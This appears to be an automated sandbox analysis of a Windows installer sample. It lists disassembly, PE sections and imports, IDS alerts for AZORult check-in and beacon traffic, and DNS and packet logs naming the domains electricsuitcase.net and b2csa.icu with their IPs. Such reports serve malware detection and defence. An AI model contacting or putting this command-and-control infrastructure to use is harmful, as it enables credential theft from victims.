                                              Thumbprint SHA-1:C85BD79A0E2F930ABE2234857E37055D30C8409B
                                              Thumbprint SHA-256:5AA39C77B8766631A4424B91E036ECE8A12EBDB8F8B865EBE08669244B774BFA
                                              Serial:74278CE4A18F0AAADF6450605278BB198B96301A
                                              Instruction
                                              sub esp, 00000184h
                                              push ebx
                                              push ebp
                                              push esi
                                              xor ebx, ebx
                                              push edi
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 00409190h
                                              mov dword ptr [esp+20h], ebx
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [00407034h]
                                              push 00008001h
                                              call dword ptr [0040711Ch]
                                              push ebx
                                              call dword ptr [0040728Ch]
                                              push 00000008h
                                              mov dword ptr [007A1FB8h], eax
                                              call 00007F35D504199Ah
                                              mov dword ptr [007A1F04h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+38h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 0079D4B8h
                                              call dword ptr [00407164h]
                                              push 00409180h
                                              push 007A1700h
                                              call 00007F35D5041644h
                                              call dword ptr [00407120h]
                                              mov ebp, 007A7000h
                                              push eax
                                              push ebp
                                              call 00007F35D5041632h
                                              push ebx
                                              call dword ptr [00407118h]
                                              cmp byte ptr [007A7000h], 00000022h
                                              mov dword ptr [007A1F00h], eax
                                              mov eax, ebp
                                              jne 00007F35D503EC0Ch
                                              mov byte ptr [esp+14h], 00000022h
                                              mov eax, 007A7001h
                                              push dword ptr [esp+14h]
                                              push eax
                                              call 00007F35D50410C2h
                                              push eax
                                              call dword ptr [00407220h]
                                              mov dword ptr [esp+1Ch], eax
                                              jmp 00007F35D503ECC5h
                                              cmp cl, 00000020h
                                              jne 00007F35D503EC08h
                                              inc eax
                                              cmp byte ptr [eax], 00000020h
                                              je 00007F35D503EBFCh
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b20000x21c10.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xeae000x720.data
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x5bc60x5c001c2121f50aaec3e631d6b7fee7746690False0.682022758152174data6.511374859754948IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x11ce0x1200640f709ec19b4ed0455a4c64e5934d5eFalse0.4520399305555556OpenPGP Secret Key5.23558258677739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x398ff80x400b0f803610c3eabc488111ca7ad209e8funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x3a20000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x3b20000x21c100x21e00a390f1be47631b0c8b3b36036c983f89False0.3124639644833948data3.7564616591434143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_BITMAP0x3b24f00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                              RT_ICON0x3b28580x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.33532163128021863
                                              RT_ICON0x3bbd000x70a8Device independent bitmap graphic, 96 x 192 x 24, image size 27648EnglishUnited States0.22493065187239944
                                              RT_ICON0x3c2da80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.37954652810581013
                                              RT_ICON0x3c6fd00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12288EnglishUnited States0.2510903426791277
                                              RT_ICON0x3ca1f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.40736514522821576
                                              RT_ICON0x3cc7a00x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 6912EnglishUnited States0.26404034896401307
                                              RT_ICON0x3ce4480x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096EnglishUnited States0.3182299012693935
                                              RT_ICON0x3cfa700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.4674015009380863
                                              RT_ICON0x3d0b180xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.287962962962963
                                              RT_ICON0x3d17c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.5127049180327868
                                              RT_ICON0x3d21480x748Device independent bitmap graphic, 24 x 48 x 24, image size 1728EnglishUnited States0.3052575107296137
                                              RT_ICON0x3d28900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.5540780141843972
                                              RT_ICON0x3d2cf80x368Device independent bitmap graphic, 16 x 32 x 24, image size 768EnglishUnited States0.3451834862385321
                                              RT_DIALOG0x3d30600x144dataEnglishUnited States0.5216049382716049
                                              RT_DIALOG0x3d31a80x13cdataEnglishUnited States0.5506329113924051
                                              RT_DIALOG0x3d32e80x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x3d33e80x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0x3d35080xc4dataEnglishUnited States0.5918367346938775
                                              RT_DIALOG0x3d35d00x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x3d36300xbcdataEnglishUnited States0.6063829787234043
                                              RT_VERSION0x3d36f00x218dataEnglishUnited States0.5317164179104478
                                              RT_MANIFEST0x3d39080x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                              DLLImport
                                              KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                              USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-15T17:37:48.886834+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.652399107.151.162.13580TCP
                                              2025-01-15T17:37:49.965763+01002029467ET MALWARE Win32/AZORult V3.3 Client Checkin M141192.168.2.652410104.21.32.180TCP
                                              2025-01-15T17:37:49.965763+01002810276ETPRO MALWARE AZORult CnC Beacon M11192.168.2.652410104.21.32.180TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 15, 2025 17:37:20.840043068 CET5223453192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:20.844881058 CET53522341.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:20.844949007 CET5223453192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:20.849936008 CET53522341.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:21.474772930 CET5223453192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:21.481142998 CET53522341.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:21.481216908 CET5223453192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:48.292965889 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.297863007 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.297939062 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.298095942 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.303019047 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886574984 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886595011 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886619091 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886635065 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886692047 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886708021 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886723995 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886833906 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886833906 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886833906 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886833906 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886833906 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886869907 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886887074 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886903048 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.886924982 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886924982 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.886946917 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.891781092 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.891807079 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.891822100 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.891850948 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.891850948 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.891932964 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.892038107 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.892079115 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975086927 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975104094 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975119114 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975177050 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975177050 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975210905 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975227118 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975253105 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975287914 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975374937 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975406885 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975420952 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975429058 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975451946 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975481033 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975804090 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975820065 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975832939 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975847006 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975858927 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975858927 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975861073 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.975893021 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.975893021 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.976499081 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.976516008 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.976530075 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.976543903 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.976557970 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.976557016 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.976557970 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.976572990 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.976581097 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.976602077 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.976620913 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.977421045 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.977436066 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.977449894 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.977464914 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:48.977466106 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.977504969 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.977505922 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:48.977505922 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.016617060 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.016633987 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.016647100 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.016674995 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.016701937 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.063625097 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063641071 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063656092 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063735962 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.063766956 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.063781977 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063796997 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063812017 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063826084 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063838959 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063853025 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063859940 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.063860893 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.063956022 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.064704895 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.064728022 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.064743042 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.064764023 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.064774990 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.064779997 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.064815044 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.064893007 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.065382004 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065447092 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.065455914 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065471888 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065485954 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065500021 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065515041 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065519094 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.065531969 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.065555096 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.065606117 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.066375017 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066399097 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066412926 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066426992 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066440105 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066459894 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066466093 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.066477060 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.066509962 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.066549063 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.067390919 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067414045 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067428112 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067442894 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067456961 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067471027 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067475080 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.067487955 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.067516088 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.067570925 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.068361998 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.068376064 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.068391085 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.068403959 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.068418026 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.068454981 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.068485022 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.104641914 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104695082 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104708910 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104722977 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104736090 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104741096 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.104751110 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104820967 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.104820967 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.104929924 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.104943991 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.105005980 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152110100 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152127028 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152142048 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152156115 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152185917 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152226925 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152255058 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152270079 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152285099 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152298927 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152309895 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152333975 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152365923 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152601004 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152616024 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152631044 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152645111 CET8052399107.151.162.135192.168.2.6
                                              Jan 15, 2025 17:37:49.152673006 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152673006 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.152704954 CET5239980192.168.2.6107.151.162.135
                                              Jan 15, 2025 17:37:49.496335030 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.501297951 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.501498938 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.501498938 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.506342888 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965646029 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965702057 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965737104 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965763092 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.965773106 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965806007 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.965842009 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.965941906 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.966274977 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.966613054 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:49.966774940 CET5241080192.168.2.6104.21.32.1
                                              Jan 15, 2025 17:37:49.971106052 CET8052410104.21.32.1192.168.2.6
                                              Jan 15, 2025 17:37:51.388237000 CET5239980192.168.2.6107.151.162.135
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 15, 2025 17:37:20.839575052 CET53644421.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:48.249058008 CET5563953192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:48.288681030 CET53556391.1.1.1192.168.2.6
                                              Jan 15, 2025 17:37:49.482278109 CET6145953192.168.2.61.1.1.1
                                              Jan 15, 2025 17:37:49.495398045 CET53614591.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 15, 2025 17:37:48.249058008 CET192.168.2.61.1.1.10x47bfStandard query (0)electricsuitcase.netA (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.482278109 CET192.168.2.61.1.1.10x9a0bStandard query (0)b2csa.icuA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 15, 2025 17:37:48.288681030 CET1.1.1.1192.168.2.60x47bfNo error (0)electricsuitcase.net107.151.162.135A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.32.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.16.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.112.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.96.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.64.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.80.1A (IP address)IN (0x0001)false
                                              Jan 15, 2025 17:37:49.495398045 CET1.1.1.1192.168.2.60x9a0bNo error (0)b2csa.icu104.21.48.1A (IP address)IN (0x0001)false
                                              • electricsuitcase.net
                                              • b2csa.icu
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.652399107.151.162.135801944C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
